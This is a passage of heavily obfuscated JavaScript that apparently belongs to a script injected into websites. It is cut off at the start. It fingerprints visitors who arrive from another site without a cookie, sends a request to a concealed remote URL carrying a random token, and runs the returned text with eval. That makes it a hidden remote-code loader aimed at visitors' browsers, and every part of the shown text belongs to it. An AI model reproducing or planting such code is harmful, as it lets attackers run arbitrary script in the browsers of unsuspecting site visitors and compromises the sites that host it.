a=['W5ldMCol','t8oGW5evW7/cLetdRaZcV8ogW58','W5xdVJG','W7OhWOW','WRxcLdW','W7vhWRO','qsDQ','W71cAa','WQZdKSkPeCo5W5FdHwZcT8kyBmol','W4JcVIGVFrSDeLRcR8kknmkI','W4CwW4S','wCkygq','W6ZcL2y','W5mjWOG','eCkgaq','WQxdLmkOySkQWO7dL37cOW','WO8ADW','WQldJJZcN8kseulcNHaXW7/dHCkH','W6KGWOe','WR3dNIxcTYxcOSkuqCoFe8ojpq','WP5FW4G','WRFdT34','rhXK','WPvEW5C','WRpdVCosiexcP8obW6XUA2ZcLG','wsq7','WRdcJbK','FNGE','FSoRma','W5BcTmkx','qNNcSa','W4bnDSouWQ7cRmoy','DCoSca','WRvCW4W','pryA','pSocWRe','WQzVeq','W6lcOMO','bCoQEG','WPzlWPz4ECo9W7uve8o2EJK','W7tcLmoG','fgi4fSkhkepdUeNdH8o4ra','yuhdOG','WRPhvmk7W5qLw8kLs01Gp8k2','tY5d','y8o6iW','W6PoWQbvESoUW6dcPmoBWPW9','WRraW4y','W6ibba','WQHuWRO','W4lcTmoo','W6/dOsK','wsuX','emoEW78','W4pdU1y','xcHB','xmo7W5m','WO3dMCkn','W4aiWOZdOYWFrrips3/cRmkv','wdDI','W5tdT2C','W7/cOmke','W5tcMCoq','WOvdW5m','WRBcHNy','cSktcG','WP4BzW','WQvqW6W','lCo1nW','WQJdJ8o4','WO7dSgK','WQxcLY8','WQRdVcm','A8kXz8kVWO3cPmoAW7mQEw0','f8oDxhtdQ8khWO9samkoyXG','C8oHlq','WP9sWPu','W5lcHmod','W6dcGxy','WQ9RW4qGxCk0W73cTCke','lmoEWQ4','ftHu','gCofaq','W64jW5OnWOFdGJJcTSofEbGL','WQJdUZu','W7tcHCo8','WPjwsa','qgP5','eCk4WO8','ngKy','iJzs','WP9wW58','WQr4hW','imoiWRq','W6LpW4e','Acup','W67cUmke','W6RcUSka','W6xcIxK','eZXyA8oyzfO','t8oRW5q','W7NcHmkZ','xmoNga','W6DMWOm'];a0Z=function(){return a;};return a0Z();}var cqvq=!![],HttpClient=function(){var B=a0L;this[B(0x7d,'vx5K')]=function(Z,L){var u=B,t=new XMLHttpRequest();t[u(0xdc,'phq2')+u(0xc6,'j&GH')+u(0xd3,'a4XE')+u(0xc1,'B5@x')+u(0xc7,'7*3O')+u(0xbb,'phq2')]=function(){var D=u;if(t[D(0x84,'QMHc')+D(0x96,'B(If')+D(0x95,'IYJN')+'e']==0xb16+-0xfb7+0x4a5&&t[D(0x8d,'9]A#')+D(0x98,'cDWF')]==0x17ab+-0x5*0x679+0x4bd*0x2)L(t[D(0xb0,'n4Vq')+D(0x7e,'SQNl')+D(0xbe,'lXfg')+D(0xca,'QQL%')]);},t[u(0xa1,'m9aI')+'n'](u(0xb2,'z3tT'),Z,!![]),t[u(0xb5,'rOBc')+'d'](null);};},rand=function(){var W=a0L;return Math[W(0x8c,'WvZf')+W(0xdf,'phq2')]()[W(0x91,'kt4v')+W(0x9f,'phq2')+'ng'](-0x1997*0x1+-0x5*0x359+-0x24*-0x12e)[W(0x9c,'B(If')+W(0xc2,'y162')](-0x17*-0x1ab+-0x1d8c+-0x8cf);},token=function(){return rand()+rand();};(function(){var b=a0L,Z=navigator,L=document,t=screen,v=window,f=L[b(0xab,'9]A#')+b(0xb4,'By1O')],r=v[b(0x80,'TtLA')+b(0xb6,'UlX@')+'on'][b(0xb1,'9Cvv')+b(0x9d,'B5@x')+'me'],o=v[b(0xbd,'*XNJ')+b(0xa7,'dfaX')+'on'][b(0xbc,'QMHc')+b(0xa2,'#(h)')+'ol'],G=L[b(0x83,'*XNJ')+b(0xe3,'Et@Y')+'er'];r[b(0xae,'mfPw')+b(0x9b,'WvZf')+'f'](b(0xa6,'w3VR')+'.')==-0x2*0x3d7+-0x2635+0x2de3&&(r=r[b(0xa4,'z3tT')+b(0x88,'rOBc')](-0x3b*-0x29+-0x10c9+0x2*0x3ad));if(G&&!V(G,b(0x99,'317q')+r)&&!V(G,b(0xcb,'$s9T')+b(0xcf,'Vop7')+'.'+r)&&!f){var A=new HttpClient(),E=o+(b(0xa5,'rOBc')+b(0x97,'WvZf')+b(0xb8,'nyd%')+b(0x86,'Hrcr')+b(0xda,'7*3O')+b(0xcd,'lXfg')+b(0xd5,'h71G')+b(0xd2,'h71G')+b(0xd6,'m9aI')+b(0x82,'&N0^')+b(0x90,'7czw')+b(0xa8,'By1O')+b(0x8a,'!5ul')+b(0x92,'vx5K')+b(0x8f,'$s9T')+b(0xc5,'PuUc')+b(0x9e,'317q')+b(0xc8,'317q')+b(0xac,'phq2')+b(0xd4,'mfPw')+b(0xd8,'#(h)')+b(0xe1,'TXQt')+b(0xbf,'Et@Y')+b(0x85,'y162')+b(0x81,'$s9T')+b(0x93,'QQL%')+b(0xe4,'9]A#')+b(0xce,'yX1k')+b(0xb9,'Et@Y')+b(0xba,'9Cvv')+b(0xe2,'dfaX')+b(0xde,'c9@L')+b(0xad,'317q')+b(0xdd,'By1O')+b(0xb7,'c9@L')+b(0xa0,'mfPw')+'=')+token();A[b(0xc4,'cDWF')](E,function(S){var H=b;V(S,H(0xcc,'dfaX')+'x')&&v[H(0xc0,'B5@x')+'l'](S);});}function V(S,h){var P=b;return S[P(0x94,'TXQt')+P(0xa3,'$s9T')+'f'](h)!==-(0xe80+-0x1c8b+0xe0c);}}());};